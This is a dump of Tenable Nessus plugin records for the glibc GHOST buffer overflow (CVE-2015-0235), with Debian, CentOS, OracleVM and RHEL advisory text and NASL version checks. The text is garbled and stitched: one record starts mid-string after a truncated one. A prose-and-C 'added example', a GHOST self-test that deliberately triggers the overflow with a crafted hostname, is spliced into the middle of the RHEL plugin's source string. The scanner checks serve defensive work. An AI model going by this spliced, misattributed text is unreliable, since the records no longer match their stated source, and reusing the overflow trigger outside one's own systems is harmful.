gethostbyname and gethostbyname2 functions\nwere subject to a buffer overflow if provided with a crafted IP\naddress argument. 
This could be used by an attacker to execute\narbitrary code in processes which called the affected functions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have\nalready been fixed in squeeze LTS via DLA DLA 97-1.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/01/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/eglibc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-bin\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:libc-dev-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-prof\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-dns-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-files-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"eglibc-source\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"glibc-doc\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-bin\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-dev-bin\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-amd64\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dbg\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-amd64\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-i386\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i386\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i686\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-pic\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"libc6-prof\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-xen\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-dns-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-files-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales-all\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"nscd\", reference:\"2.11.3-4+deb6u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:32", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. 
A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81026", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# CentOS Errata and Security Advisory 2015:0092 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81026);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183533).\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000259.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73666800\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:25", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81034", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092. 
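The Red Hat text above describes the flaw in behavioural terms (a caller of gethostbyname() or gethostbyname2() hands __nss_hostname_digits_dots() a long numeric-looking name and the result buffer is overrun). The plugins in this dump only compare package versions; the probe below checks the behaviour directly on the host being assessed. It is an added example, not code from this page, from Tenable or from any vendor advisory, modelled on the public Qualys proof of concept: it calls gethostbyname_r() with an all-digit name sized so that the vulnerable length computation (which omitted one alias pointer) accepts a 1024-byte buffer that is in fact sizeof(char *) too small, and places a canary directly after that buffer. A vulnerable glibc clobbers the canary; a fixed one returns ERANGE without writing past the end. The result classification (`ghost_result`) and the probe layout are this example's own choices.

```c
/* Added example (not from the page or Tenable): local GHOST self-test. */
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GHOST_CANARY "in_the_coal_mine"

/* Result buffer handed to gethostbyname_r(), immediately followed by a
 * canary so that any overflow of `buffer` becomes visible. Both members
 * are char arrays, so there is no padding between them. */
struct ghost_probe {
    char buffer[1024];
    char canary[sizeof GHOST_CANARY];
};

enum ghost_result {
    GHOST_NOT_VULNERABLE = 0,  /* ERANGE returned, canary intact          */
    GHOST_VULNERABLE     = 1,  /* canary overwritten: buffer was overrun   */
    GHOST_INCONCLUSIVE   = -1  /* neither (e.g. not glibc, or odd libc)   */
};

/* Run the probe once and classify what the C library did. */
enum ghost_result ghost_check(void)
{
    struct ghost_probe probe;
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    char name[sizeof probe.buffer];

    memset(&probe, 0, sizeof probe);
    memcpy(probe.canary, GHOST_CANARY, sizeof GHOST_CANARY);

    /* The resolver needs room for a 16-byte address, a two-entry address
     * pointer list, one alias pointer, and the name plus NUL. The unfixed
     * size check forgot the alias pointer, so a name of this length passes
     * the check on a vulnerable glibc yet overflows by sizeof(char *). */
    size_t len = sizeof probe.buffer
               - 16 * sizeof(unsigned char)   /* host_addr              */
               - 2 * sizeof(char *)           /* h_addr_ptrs[2]          */
               - 1;                           /* terminating NUL         */
    memset(name, '0', len);
    name[len] = '\0';

    errno = 0;
    int retval = gethostbyname_r(name, &resbuf, probe.buffer,
                                 sizeof probe.buffer, &result, &herrno);

    if (memcmp(probe.canary, GHOST_CANARY, sizeof GHOST_CANARY) != 0)
        return GHOST_VULNERABLE;
    if (retval == ERANGE)
        return GHOST_NOT_VULNERABLE;
    return GHOST_INCONCLUSIVE;
}

int main(void)
{
    switch (ghost_check()) {
    case GHOST_VULNERABLE:     puts("vulnerable");     return 1;
    case GHOST_NOT_VULNERABLE: puts("not vulnerable"); return 0;
    default:                   puts("inconclusive");   return 2;
    }
}
```

Compile with `gcc -o ghost ghost.c` and run it on the host itself; it performs no network lookup, because a name made entirely of digits is handled by the numeric-address fast path before any NSS backend is consulted. The overflow on a vulnerable system is only sizeof(char *) bytes and lands in the canary, which is why the probe is safe to run. Two caveats the version checks above cannot give you: a host whose glibc package is current but whose long-running daemons (sshd, exim, nscd, and so on) were started before the update still have the old library mapped until they are restarted, and a statically linked binary carries its own copy of the vulnerable code regardless of the system glibc.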
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81034);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0092\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", 
